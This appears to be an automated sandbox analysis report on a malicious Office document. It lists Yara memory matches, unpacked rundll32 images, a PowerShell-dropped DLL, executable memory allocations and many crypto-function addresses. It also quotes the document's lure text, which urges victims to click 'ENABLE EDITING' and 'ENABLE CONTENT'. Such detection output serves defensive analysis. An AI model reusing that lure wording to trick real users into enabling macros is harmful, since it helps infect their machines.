Source: Yara match File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 8,758 N@m 13 ;a 1009
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5677
Source: unknown Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5576 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00771328 NtSetInformationKey, 13_2_00771328
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Xsugi\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00257D7D 7_2_00257D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002589F6 7_2_002589F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C424 7_2_0025C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024DC2F 7_2_0024DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242628 7_2_00242628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244A2B 7_2_00244A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247E34 7_2_00247E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258831 7_2_00258831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024903F 7_2_0024903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A83A 7_2_0024A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247605 7_2_00247605
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024620A 7_2_0024620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248816 7_2_00248816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025F411 7_2_0025F411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F813 7_2_0024F813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D013 7_2_0024D013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024421E 7_2_0024421E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258668 7_2_00258668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C07D 7_2_0024C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D44C 7_2_0024D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C04C 7_2_0025C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00254E4B 7_2_00254E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024704B 7_2_0024704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245856 7_2_00245856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241658 7_2_00241658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00251259 7_2_00251259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025CAA0 7_2_0025CAA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244EA1 7_2_00244EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248CA3 7_2_00248CA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C6AD 7_2_0025C6AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002456B3 7_2_002456B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255AB8 7_2_00255AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245EB9 7_2_00245EB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00254693 7_2_00254693
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249AE1 7_2_00249AE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002542E2 7_2_002542E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002494EC 7_2_002494EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C6EF 7_2_0024C6EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DEE8 7_2_0025DEE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002506C2 7_2_002506C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249CC8 7_2_00249CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D2CB 7_2_0025D2CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D0DE 7_2_0024D0DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025BF25 7_2_0025BF25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DB25 7_2_0025DB25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024492A 7_2_0024492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D530 7_2_0025D530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024213E 7_2_0024213E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255115 7_2_00255115
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CF11 7_2_0024CF11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025231B 7_2_0025231B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258F65 7_2_00258F65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00252965 7_2_00252965
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250F6D 7_2_00250F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025676B 7_2_0025676B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A176 7_2_0024A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00251B71 7_2_00251B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00257570 7_2_00257570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00253D7C 7_2_00253D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DD78 7_2_0025DD78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00256B45 7_2_00256B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CB42 7_2_0024CB42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025654F 7_2_0025654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00243D4E 7_2_00243D4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002599A4 7_2_002599A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255DAA 7_2_00255DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025EDB9 7_2_0025EDB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E19F 7_2_0025E19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245BE1 7_2_00245BE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242DEE 7_2_00242DEE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002537F4 7_2_002537F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B3FE 7_2_0025B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00246BC0 7_2_00246BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002573C0 7_2_002573C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002577C0 7_2_002577C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00259DC0 7_2_00259DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025CDCC 7_2_0025CDCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024ADCE 7_2_0024ADCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002593C9 7_2_002593C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B1D2 7_2_0025B1D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244BDE 7_2_00244BDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027303C 7_2_0027303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00281E14 7_2_00281E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00523856 7_2_00523856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519055 7_2_00519055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C014 7_2_0052C014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C83F 7_2_0052C83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052502C 7_2_0052502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005210E5 7_2_005210E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D099 7_2_0052D099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052188F 7_2_0052188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C0B6 7_2_0051C0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005210BB 7_2_005210BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005260B9 7_2_005260B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514152 7_2_00514152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00515155 7_2_00515155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052A972 7_2_0052A972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00516134 7_2_00516134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526934 7_2_00526934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052893D 7_2_0052893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C9C0 7_2_0051C9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B998 7_2_0052B998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052E985 7_2_0052E985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051D1A3 7_2_0051D1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00518A60 7_2_00518A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00518217 7_2_00518217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051923C 7_2_0051923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00525AC3 7_2_00525AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005132C2 7_2_005132C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005232F0 7_2_005232F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005272F1 7_2_005272F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526AE4 7_2_00526AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D2EC 7_2_0052D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C340 7_2_0052C340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00516B79 7_2_00516B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00512362 7_2_00512362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052531E 7_2_0052531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052E32D 7_2_0052E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527BDC 7_2_00527BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00510BCC 7_2_00510BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00511B9C 7_2_00511B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005243BF 7_2_005243BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005173A8 7_2_005173A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D45C 7_2_0052D45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051BC63 7_2_0051BC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00523C07 7_2_00523C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052BC21 7_2_0052BC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514C27 7_2_00514C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051542D 7_2_0051542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005284D9 7_2_005284D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00525CDF 7_2_00525CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005204E1 7_2_005204E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B499 7_2_0052B499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C485 7_2_0051C485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526D34 7_2_00526D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B5C0 7_2_0052B5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514DCA 7_2_00514DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051B5F1 7_2_0051B5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051ED87 7_2_0051ED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C587 7_2_0051C587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00517D8A 7_2_00517D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005185B3 7_2_005185B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005165BF 7_2_005165BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527DA5 7_2_00527DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519DAD 7_2_00519DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519DAE 7_2_00519DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C652 7_2_0051C652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00521ED9 7_2_00521ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00513E9E 7_2_00513E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00524689 7_2_00524689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005116B2 7_2_005116B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052A746 7_2_0052A746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051577E 7_2_0051577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527F6A 7_2_00527F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D713 7_2_0052D713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00528F18 7_2_00528F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00513F9F 7_2_00513F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023DC2F 8_2_0023DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023903F 8_2_0023903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023620A 8_2_0023620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00239CC8 8_2_00239CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023492A 8_2_0023492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023A176 8_2_0023A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00243D7C 8_2_00243D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00247D7D 8_2_00247D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024654F 8_2_0024654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002437F4 8_2_002437F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002489F6 8_2_002489F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024B3FE 8_2_0024B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002493C9 8_2_002493C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C424 8_2_0024C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00234A2B 8_2_00234A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00232628 8_2_00232628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00248831 8_2_00248831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00237E34 8_2_00237E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023A83A 8_2_0023A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00237605 8_2_00237605
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023F813 8_2_0023F813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023D013 8_2_0023D013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00238816 8_2_00238816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024F411 8_2_0024F411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023421E 8_2_0023421E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00248668 8_2_00248668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023C07D 8_2_0023C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023704B 8_2_0023704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C04C 8_2_0024C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023D44C 8_2_0023D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00244E4B 8_2_00244E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00235856 8_2_00235856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00231658 8_2_00231658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00241259 8_2_00241259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00238CA3 8_2_00238CA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00234EA1 8_2_00234EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024CAA0 8_2_0024CAA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C6AD 8_2_0024C6AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002356B3 8_2_002356B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00235EB9 8_2_00235EB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00245AB8 8_2_00245AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00244693 8_2_00244693
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00239AE1 8_2_00239AE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002442E2 8_2_002442E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023C6EF 8_2_0023C6EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024DEE8 8_2_0024DEE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002394EC 8_2_002394EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002406C2 8_2_002406C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024D2CB 8_2_0024D2CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023D0DE 8_2_0023D0DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024BF25 8_2_0024BF25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024DB25 8_2_0024DB25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024D530 8_2_0024D530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023213E 8_2_0023213E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00245115 8_2_00245115
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023CF11 8_2_0023CF11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024231B 8_2_0024231B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00248F65 8_2_00248F65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00242965 8_2_00242965
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00240F6D 8_2_00240F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024676B 8_2_0024676B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00247570 8_2_00247570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00241B71 8_2_00241B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024DD78 8_2_0024DD78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0023CB42 8_2_0023CB42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00246B45 8_2_00246B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00233D4E 8_2_00233D4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002499A4 8_2_002499A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00245DAA 8_2_00245DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024EDB9 8_2_0024EDB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024E19F 8_2_0024E19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00235BE1 8_2_00235BE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00232DEE 8_2_00232DEE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00236BC0 8_2_00236BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002473C0 8_2_002473C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002477C0 8_2_002477C0
